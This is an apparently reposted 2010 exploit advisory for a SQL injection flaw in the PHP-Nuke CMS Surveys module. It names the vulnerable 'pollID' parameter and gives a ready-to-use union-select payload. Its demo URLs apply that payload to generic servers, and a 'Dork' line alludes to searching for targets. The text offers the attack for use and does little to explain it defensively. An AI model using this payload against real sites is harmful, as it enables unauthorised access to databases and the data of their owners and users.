Home / os / winme

PHP-NUKE CMS (Survey and Poll) SQL Injection Vulnerability

Posted on 04 March 2010

========================================================= PHPNUKE CMS (Survey and Poll) SQL Injection Vulnerability ========================================================= ############################################################################################################# ## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner ## ## Date : Thursday 04 March, 2010 ## ## Location : - INDONESIA - ## ############################################################################################################# [+] CMS INFO [+] Name : PHPNUKE CMS [+] Vendor : http://phpnuke.org/ [+] Download : http://phpnuke.org/modules.php?name=Downloads [+] Vulnerability : SQL [+] Dork : "Dork Just for newbie" ############################################################################################################# [ Vulnerable File ] [+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER] [ XpL ] [+] +and+1=2+union+select+1,version(),3,4-- [ DEMO ] [+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4-- [+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4-- ############################################################################################################# # ~ - [ [ : Inj3ct0r : ] ]

 

TOP

Malware :